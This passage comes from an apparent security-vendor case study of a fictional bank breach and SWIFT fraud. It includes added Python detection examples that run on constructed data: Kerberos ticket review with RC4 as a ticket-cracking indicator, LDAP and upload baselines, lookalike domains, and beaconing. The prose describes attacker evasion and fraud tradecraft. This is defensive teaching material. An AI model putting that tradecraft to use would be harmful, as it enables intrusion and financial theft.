accounts requesting high numbers of Kerberos
service tickets per day, and adding exceptions
for noisy accounts, could easily spot SPN
scanning. Likewise, LDAP traffic from the bulk
of the network should have relatively tight
parameters of data-flow quantity, so a daily
review of systems seen making heavy use of
LDAP could spot network enumeration.
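The two "simple first steps" above, and the Kerberos service ticket cracking described in the lateral movement section, as one added example (not code from the F-Secure paper or the Countercept product): count event ID 4769 service ticket requests per account per day with an exception list for noisy accounts, count distinct services (an SPN scan followed by ticket requests touches far more services than a user ever does), flag workstations whose LDAP volume is far above the estate median, and join the two so a flagged account is tied to the workstation that did the enumeration. The 4769 records and flow summaries are constructed; the thresholds, the NOISY_ACCOUNTS list and the use of RC4-encrypted tickets (etype 0x17) as an additional indicator are assumptions, the last being a widely used heuristic rather than something the paper states.

```python
"""Daily review of Kerberos service-ticket requests (event ID 4769) per account, plus
LDAP traffic volume per workstation, as first-step detections for SPN scanning and
Kerberos service-ticket cracking. Added example; not code from the F-Secure paper.
Events and flow records are constructed below."""
from collections import Counter, defaultdict
from statistics import median

NOISY_ACCOUNTS = {"svc_backup"}   # assumption: tuned exceptions for legitimately busy accounts
RC4_HMAC = 0x17                   # TicketEncryptionType requested by common cracking tooling


def review_ticket_requests(events: list, max_per_day: int = 200, max_services: int = 100) -> list:
    """Flag (day, account) pairs with an unusual number of 4769 events or distinct services."""
    per_day, rc4, services = Counter(), Counter(), defaultdict(set)
    for e in events:           # fields mirror 4769: TargetUserName, IpAddress, ServiceName, TicketEncryptionType
        key = (e["day"], e["account"])
        per_day[key] += 1
        services[key].add(e["service"])
        if e["etype"] == RC4_HMAC:
            rc4[key] += 1
    findings = []
    for (day, acct), n in per_day.items():
        if acct in NOISY_ACCOUNTS:
            continue
        reasons = []
        if n > max_per_day:
            reasons.append(f"{n} service tickets in one day")
        if len(services[(day, acct)]) > max_services:
            reasons.append(f"{len(services[(day, acct)])} distinct services requested")
        if reasons and rc4[(day, acct)]:
            reasons.append(f"{rc4[(day, acct)]} tickets requested with RC4 (etype 0x17)")
        if reasons:
            findings.append({"day": day, "account": acct, "reasons": reasons})
    return findings


def review_ldap_volume(flows: list, factor: float = 10.0) -> list:
    """Hosts sending more than `factor` times the estate median to LDAP / Global Catalog ports."""
    per_host = Counter()
    for f in flows:
        if f["dport"] in (389, 636, 3268, 3269):
            per_host[f["src"]] += f["bytes"]
    baseline = median(per_host.values())
    return sorted(h for h, b in per_host.items() if b > factor * baseline)


def correlate(ticket_findings: list, ldap_hosts: list, events: list) -> list:
    """Pair each flagged account with the heavy-LDAP workstations it requested tickets from."""
    clients = defaultdict(set)
    for e in events:
        clients[e["account"]].add(e["client"])
    return [(f["account"], ip) for f in ticket_findings
            for ip in sorted(clients[f["account"]] & set(ldap_hosts))]


def make_4769_events(day: str = "2018-07-20") -> list:
    """Constructed day of 4769 records: three ordinary users, one noisy backup account,
    and one phished user whose workstation (10.10.5.42) runs an SPN scan."""
    ev = []
    for user, ip in (("asmith", "10.10.5.11"), ("bjones", "10.10.5.12"), ("clee", "10.10.5.13")):
        for svc in ("cifs/fs01", "http/intranet", "MSSQLSvc/hr-db:1433", "cifs/fs02", "ldap/dc01"):
            ev.append({"day": day, "account": user, "client": ip, "service": svc, "etype": 0x12})
    for i in range(1500):
        ev.append({"day": day, "account": "svc_backup", "client": "10.10.9.5",
                   "service": f"cifs/host{i:04d}", "etype": 0x12})
    for i in range(2000):
        ev.append({"day": day, "account": "jdoe", "client": "10.10.5.42",
                   "service": f"MSSQLSvc/db{i:04d}.acmebank.com:1433", "etype": RC4_HMAC})
    return ev


def make_ldap_flows() -> list:
    """Constructed per-host flow summaries for one day: fifty workstations, one of them noisy."""
    flows = [{"src": f"10.10.5.{i}", "dst": "10.10.0.10", "dport": 389, "bytes": 20_000}
             for i in range(11, 61)]
    flows.append({"src": "10.10.5.42", "dst": "10.10.0.10", "dport": 3268, "bytes": 9_000_000})
    flows.append({"src": "10.10.5.42", "dst": "10.10.0.20", "dport": 443, "bytes": 50_000})
    return flows
```

On the constructed day the backup account's 1,500 tickets are suppressed by the exception list, `jdoe` is flagged on volume, distinct-service count and RC4 use, and the LDAP review names 10.10.5.42, which `correlate` ties back to the same account; that pairing is the lead an analyst would take to the workstation's process history.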
Yet Another BreachYet Another Breach
20
Laser Tiger used many different IPs and domains throughout its
campaign for both phishing sites and command-and-control
channels. A number of techniques was used to disguise the sites,
including:
• Reusing recently-expired domains that already had good reputations
• Ensuring sites were correctly categorized by web filters as benign
• Using legitimate content within sites
• Impersonating Acme Bank domains
• Using content distribution networks (CDNs) to proxy traffic
The infrastructure used was also changed regularly with no IP/
domain reused between campaigns. Acme Bank often focused
on blocking individual IPs/domains, and failed to anticipate
the attackers changing infrastructure to evade these controls.
The payloads on both workstations and servers were seen
communicating with the C2 infrastructure over HTTP, using
encrypted payloads.
At various points during the attack there would have been noticeably larger quantities of network traffic than usual. Large-scale mining of LDAP for information and SPN scanning would require unusually high levels of LDAP traffic between compromised workstations and domain controllers. Meanwhile, interactive RDP sessions over long periods, and the theft of large data sets along the way, would have resulted in far more internet-bound upload traffic than usual from the compromised systems. However, Acme Bank didn't have good net-flow data feeding into its SIEM, or analysis techniques that would have been able to spot deviations from normal traffic patterns.
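The net-flow baseline that Acme Bank lacked, as an added example that is not from the whitepaper. It compares each workstation's internet-bound upload bytes, and separately its LDAP bytes to the domain controllers, with that host's own 14-day history using a median plus k times MAD limit, so one earlier bad day cannot inflate the baseline the way a mean would. Host names, byte counts, the multiplier k and the absolute floor are constructed assumptions; in practice the figures come from net-flow, proxy or domain controller logs.

```python
"""Added example (not from the whitepaper): a daily volume review of two
feeds, internet-bound upload bytes per workstation and LDAP bytes from each
workstation to the domain controllers.  Each host is compared with its own
recent history using a median/MAD baseline.  All figures are constructed."""
import statistics

MB, KB = 1_000_000, 1_000

# Constructed: bytes uploaded to the internet per workstation per day, 14-day history.
UPLOAD_HISTORY = {
    "WS-0412": [v * MB for v in (20, 25, 18, 22, 30, 21, 19, 24, 26, 23, 20, 22, 27, 21)],
    "WS-0917": [v * MB for v in (15, 14, 16, 15, 17, 15, 14, 16, 15, 15, 14, 16, 15, 15)],
    "WS-1103": [v * MB for v in (8, 9, 7, 8, 8, 9, 7, 8, 8, 8, 9, 7, 8, 8)],
}
# Today: WS-0917 pushed 410 MB out (a stolen data set); WS-NEW has no history yet.
UPLOAD_TODAY = {"WS-0412": 24 * MB, "WS-0917": 410 * MB, "WS-1103": 9 * MB, "WS-NEW": 3 * MB}

# Constructed: bytes from each workstation to the DCs on LDAP ports (389/636/3268).
LDAP_HISTORY = {
    "WS-0412": [v * KB for v in (300, 280, 310, 295, 305, 290, 300, 320, 285, 300, 310, 295, 300, 290)],
    "WS-0917": [v * KB for v in (150, 160, 140, 155, 150, 145, 160, 150, 150, 155, 145, 150, 160, 150)],
}
# Today: WS-0917 pulled 48 MB over LDAP, consistent with bulk directory mining.
LDAP_TODAY = {"WS-0412": 310 * KB, "WS-0917": 48 * MB}


def robust_baseline(values, k=5.0, mad_floor_fraction=0.1):
    """Return (median, upper limit) where the limit is median + k * MAD.
    The MAD is floored at a fraction of the median so a perfectly flat
    history still leaves some headroom instead of alerting on any change."""
    median = statistics.median(values)
    mad = statistics.median(abs(v - median) for v in values)
    mad = max(mad, median * mad_floor_fraction)
    return median, median + k * mad


def flag_volume_anomalies(history, today, k=5.0, min_bytes=1 * MB):
    """Return [(host, today's bytes, median, ratio to median)] for hosts above
    their own baseline and above an absolute floor (min_bytes, assumed), plus
    hosts with no history at all, which get None values and need a manual look."""
    hits = []
    for host, value in sorted(today.items()):
        past = history.get(host)
        if not past:
            hits.append((host, value, None, None))
            continue
        median, limit = robust_baseline(past, k)
        if value > max(limit, min_bytes):
            hits.append((host, value, median, round(value / median, 1) if median else None))
    return hits


if __name__ == "__main__":
    for label, hist, today in (("internet upload", UPLOAD_HISTORY, UPLOAD_TODAY),
                               ("LDAP to DCs", LDAP_HISTORY, LDAP_TODAY)):
        for host, value, median, ratio in flag_volume_anomalies(hist, today):
            print("%s: %s sent %d bytes (median %s, x%s)" % (label, host, value, median, ratio))
```

The same function serves both feeds; only the history changes. The absolute floor matters for the LDAP feed, where a quiet workstation's baseline is a few hundred kilobytes and a single large group lookup would otherwise trip the limit.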
F-SECURE COUNTERCEPT INSIGHTS
Monitoring for anomalous traffic flows can be particularly
challenging when facing an advanced attacker. Traditional
approaches, such as using technical threat intelligence
involving ‘known-bad’ domains and IP addresses, are
ineffective as the attackers will simply use new infrastructure
that has no history of malicious activity. Reputation-based
analysis is a step forward but ineffective when the attackers
use positive reputation addresses, as in this case and likely in
any targeted attack conducted by a skilled group.
Domain history could also have provided useful findings, as some of the phishing domains had been registered only weeks or months before they were used. Analysis of DNS data for domains containing the word 'Acme', or for unfamiliar domains that closely resemble the bank's real domains, would also have highlighted those used by Laser Tiger. Careful analysis of registration dates, registrars, and other attributes of the domains seen in the originally reported phishing emails and implant payloads might also have provided leads. These could then be correlated against every domain appearing in Acme Bank's logs to construct a shortlist of other potentially malicious domains.
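The domain analysis above, as an added example that is not the whitepaper's own code. From constructed DNS query lines it extracts the registrable domain of each query and applies the three checks described: the brand keyword, edit distance to the bank's real domains, and registration age. The legitimate domain list, the log lines and the registration dates are constructed assumptions; in practice the dates come from WHOIS or passive-DNS data, and the registrable-domain split should use the public suffix list rather than the naive last-two-labels rule used here.

```python
"""Added example (not from the whitepaper): build a shortlist of suspicious
domains from DNS query logs using a brand keyword, lookalike detection
against the bank's real domains, and recent registration.  Log lines,
legitimate domains and registration dates are all constructed."""
from datetime import date

# Constructed DNS log lines: "<date> <time> <client> <queried name>".
DNS_LOG = """
2016-02-17 10:02:15 WS-0412 acme-survey.com
2016-02-17 10:03:01 WS-0917 acmebank.com
2016-02-17 10:05:44 WS-1103 acmebamk.com
2016-02-17 10:06:10 WS-0412 www.google.com
2016-02-17 10:07:22 WS-0917 support.acme-bank-help.com
2016-02-17 10:08:00 WS-1103 microsoft.com
2016-02-17 10:09:30 WS-0412 newsletterz.info
2016-02-17 10:11:05 WS-0917 login.acmebank.com.
""".strip().splitlines()

LEGIT_DOMAINS = {"acmebank.com", "acme-bank.com"}   # constructed: the bank's own domains

# Constructed registration dates; a domain missing here has unknown age.
CREATION_DATES = {
    "acmebank.com": "1998-05-03",
    "acme-survey.com": "2016-01-28",
    "acmebamk.com": "2016-02-01",
    "acme-bank-help.com": "2015-11-15",
    "newsletterz.info": "2016-02-10",
}


def registrable(name):
    """Naive registrable domain: the last two labels.  A real implementation
    would consult the public suffix list so that 'example.co.uk' is handled."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic-programming form)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def shortlist_domains(log_lines, legit, creation_dates, as_of,
                      keyword="acme", max_distance=2, max_age_days=90):
    """Return {domain: [reasons]} for every registrable domain in the log that
    trips at least one check.  The bank's own domains are never listed.
    max_distance and max_age_days are assumed starting values."""
    as_of = date.fromisoformat(as_of)
    legit_by_label = {registrable(d).split(".")[0]: d for d in legit}
    seen = {registrable(line.split()[-1]) for line in log_lines if line.strip()}
    shortlist = {}
    for domain in sorted(seen - set(legit)):
        label = domain.split(".")[0]
        reasons = []
        if keyword in label:
            reasons.append(f"contains '{keyword}'")
        dist, closest = min((levenshtein(label, l), d) for l, d in legit_by_label.items())
        if dist <= max_distance:
            reasons.append(f"{dist} edit(s) from {closest}")
        created = creation_dates.get(domain)
        if created is not None:
            age = (as_of - date.fromisoformat(created)).days
            if age <= max_age_days:
                reasons.append(f"registered {age} days ago")
        if reasons:
            shortlist[domain] = reasons
    return shortlist


if __name__ == "__main__":
    for domain, reasons in shortlist_domains(DNS_LOG, LEGIT_DOMAINS, CREATION_DATES, "2016-02-17").items():
        print(domain, "->", "; ".join(reasons))
```

The output is a shortlist for an analyst, not an alert: a domain that trips all three checks (here the typo-squat registered two weeks earlier) goes to the top, while a domain flagged only for age is reviewed in bulk.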
Detection of anomalous data flows relating to key services
and outbound traffic was discussed previously, but there are
other techniques that can be applied specifically to identify
communications channels. Similar learning models can be
applied to the standard user agents used by each system.
This will help identify new user agents that are potentially
related to an implant, while statistical techniques can identify
long-running, regular communication with outside domains
that are indicative of ‘beaconing’ behavior. These techniques
are false-positive prone when used in isolation. However,
when combined with anomaly-detection techniques, and
enriched with information on domains (such as global
popularity), they can yield strong defensive results. A smaller
number of systems that start beaconing to a previously
unseen domain can be differentiated from a popular Google
domain related to Google Chat that has been seen on the
network for many years.
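The beaconing, user-agent and enrichment checks combined, as an added example that is not part of the whitepaper. Constructed proxy records contain a legitimate chat client polling exactly every 30 seconds, an implant calling home roughly every 60 seconds with jitter through a user agent its host had never used, and ordinary irregular browsing. The baseline of how many hosts used each domain, and of which user agents each host used, is also constructed; the coefficient-of-variation threshold and the minimum event count are assumed starting values.

```python
"""Added example (not from the whitepaper): triage outbound web-proxy records
for command-and-control channels: regular 'beaconing' to a domain (low
variance in the gaps between requests), a user agent the workstation has
never used before, and enrichment with how widely the domain was seen on
the network during a baseline period.  All data below is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import statistics

CHROME = "Mozilla/5.0 (Windows NT 6.1) Chrome/49.0"
IMPLANT_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)"

# Constructed: user agents each workstation used during the baseline period.
KNOWN_UA_BY_HOST = {"WS-0412": {CHROME}, "WS-0917": {CHROME}}
# Constructed: how many hosts contacted each domain in the baseline, and since when.
DOMAIN_BASELINE = {
    "chat.google.com": {"hosts": 480, "first_seen": "2013-06-02"},
    "intranet.acme.local": {"hosts": 900, "first_seen": "2011-01-10"},
}


def _ts(seconds):
    """Timestamp `seconds` after a constructed start time, as the proxy logs it."""
    return (datetime(2016, 4, 11, 9, 0, 0) + timedelta(seconds=seconds)).strftime("%Y-%m-%d %H:%M:%S")


_JITTER = [0, 3, -2, 5, 1, -4, 2, -1, 4, -3, 0, 2]
# Constructed proxy records: (time, host, domain, user agent).
PROXY_LOG = (
    # Legitimate chat client polling exactly every 30 s with the usual browser UA.
    [(_ts(30 * i), "WS-0412", "chat.google.com", CHROME) for i in range(12)]
    # Implant beaconing roughly every 60 s with jitter, via a never-before-seen UA.
    + [(_ts(60 * i + _JITTER[i]), "WS-0917", "cdn-assets-static.net", IMPLANT_UA) for i in range(12)]
    # Ordinary, irregular browsing.
    + [(_ts(s), "WS-0917", "intranet.acme.local", CHROME) for s in (12, 340, 345, 433, 1033, 1040, 1900, 1902, 2500)]
)


def beacon_candidates(records, min_events=8, max_cv=0.2):
    """(host, domain) pairs whose request gaps are regular: coefficient of
    variation (stdev / mean of the gaps) at or below max_cv."""
    times = defaultdict(list)
    for when, host, domain, _ua in records:
        times[(host, domain)].append(datetime.strptime(when, "%Y-%m-%d %H:%M:%S"))
    found = {}
    for pair, stamps in times.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            found[pair] = {"interval_s": round(mean, 1), "cv": round(cv, 3), "events": len(stamps)}
    return found


def new_user_agents(records, known_ua_by_host):
    """(host, user agent) pairs not seen for that host in the baseline."""
    return {(host, ua) for _when, host, _domain, ua in records
            if ua not in known_ua_by_host.get(host, set())}


def triage(records, known_ua_by_host, domain_baseline, min_events=8, max_cv=0.2, rare_hosts=5):
    """Beacon candidates with their enrichment reasons, strongest first.  A
    regular channel to a domain the whole network has used for years ends up
    with no reasons and sinks to the bottom of the list."""
    beacons = beacon_candidates(records, min_events, max_cv)
    new_uas = new_user_agents(records, known_ua_by_host)
    uas_per_pair = defaultdict(set)
    for _when, host, domain, ua in records:
        uas_per_pair[(host, domain)].add(ua)
    rows = []
    for (host, domain), info in beacons.items():
        reasons = []
        base = domain_baseline.get(domain)
        if base is None:
            reasons.append("domain not seen in baseline")
        elif base["hosts"] < rare_hosts:
            reasons.append(f"domain seen on only {base['hosts']} hosts in baseline (since {base['first_seen']})")
        if any((host, ua) in new_uas for ua in uas_per_pair[(host, domain)]):
            reasons.append("new user agent for this host")
        rows.append((host, domain, info["interval_s"], reasons))
    return sorted(rows, key=lambda r: -len(r[3]))


if __name__ == "__main__":
    for host, domain, interval, reasons in triage(PROXY_LOG, KNOWN_UA_BY_HOST, DOMAIN_BASELINE):
        print("%s -> %s every %ss: %s" % (host, domain, interval, "; ".join(reasons) or "no enrichment hits"))
```

On its own the interval test reports both the chat client and the implant, which is the false-positive problem the text describes; the enrichment is what separates a single host talking to a domain nobody else has used from a domain hundreds of hosts have polled for years.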
ACTIONS ON OBJECTIVES

Once Laser Tiger had compromised a SWIFT administrator's workstation and privileged user account, it had unrestricted access to the SWIFT environment. The earliest timestamps indicate the attackers had access to the payment systems from early July, when they presumably began gathering information on the payment process. They are suspected of injecting transfer information into the payment files held on an FTP server before those files were retrieved by the SWIFT application. Unscheduled restarts of critical servers were seen shortly after the unusual SWIFT transfers took place; the attackers are thought to have performed these restarts to remove forensic artefacts from memory.
One day prior to the actual fraudulent SWIFT transactions, a Distributed Denial of Service (DDoS) attack was launched against Acme Bank's main corporate website, taking it offline for eight hours. The attack lasted for around 24 hours, making it the main focus of the bank's security team during that period. Though no link can be proven, the timing of the attack, just before the SWIFT transfers, and the fact that no group claimed responsibility for the DDoS or demanded a ransom suggest it was a diversionary tactic by Laser Tiger. Only on discovering the fraudulent transactions did Acme Bank become aware of the full extent of the compromise and launch a dedicated incident response process.
TIMELINE OF ATTACK (dates in DD/MM/YY)

05/01/16  First phishing attacks launched with a Microsoft Office macro payload
06/01/16  User reports suspicious email to security team. Security team confirms email is malicious and begins investigation
07/01/16  Command-and-control channel is confirmed and blocked at the web proxy
09/01/16  Workstations are replaced and passwords reset for all users who were confirmed to have received the same email
17/02/16  Large-scale phishing campaign focused on credentials theft using 'acme-survey.com'
18/02/16  User reports suspicious email and credentials are reset for users who accessed the site
08/04/16  Phishing emails referencing a fake support site dropping an HTA payload are delivered
11/04/16  Phishing campaign targets a smaller number of users with a different HTA payload
10/05/16  First use of compromised domain service account
13/05/16  SWIFT admin user account used to illegitimately access the SWIFT environment
22/07/16  Distributed Denial of Service takes down Acme Bank website for 8 hours
23/07/16  SWIFT transfers are made to overseas accounts
25/07/16  Bank discovers fraudulent transaction and begins incident response
CONCLUSIONS

This compromise is an example of how today's cyber attackers continually perform reconnaissance and escalation of access over a period of months or longer to achieve their goals. Prevention and detection tactics can slow the attacker, but whether they come to a standstill depends on the skill and persistence of the attacking and defending teams.

The Laser Tiger group demonstrated a very high level of operational security in using in-memory techniques and custom payloads, relying on legitimate Windows functionality, targeting specific users, and maintaining and regularly changing a comprehensive set of C2 channels. The Acme Bank security team was unprepared to handle such an adversary and, as a result, the organization suffered a significant financial loss.

KEY TAKEAWAYS:
• Defense informs offense, offense informs defense. Understanding the techniques used by the threat allows you to prevent and detect more effectively
• Both prevention and detection should be used to slow a determined attacker
• Your network needs to be continually defended, requiring a skilled team of threat hunters
• Real-time, continuous monitoring of endpoints is essential – workstations are the front line, and the most common entry point into your network
• Response times matter. Although real-time detection is unlikely, spotting an attacker in the first hours or days of an attack is a huge win, especially considering compromises can last weeks, months, or even years
• Many traditional security controls aren't capable of preventing or detecting modern offensive techniques used in targeted attacks. Modern approaches are needed, and targeted attack simulation exercises are the only way to truly test your defenses

STEPS TOWARDS SECURITY:
• Conduct a static analysis of all email attachments
• Use more generic indicators to triage attachments for manual analysis
• Ensure your EDR toolsets can gather as much persistence data as possible
• Review accounts requesting high numbers of Kerberos tickets
• Regularly carry out targeted attack simulation exercises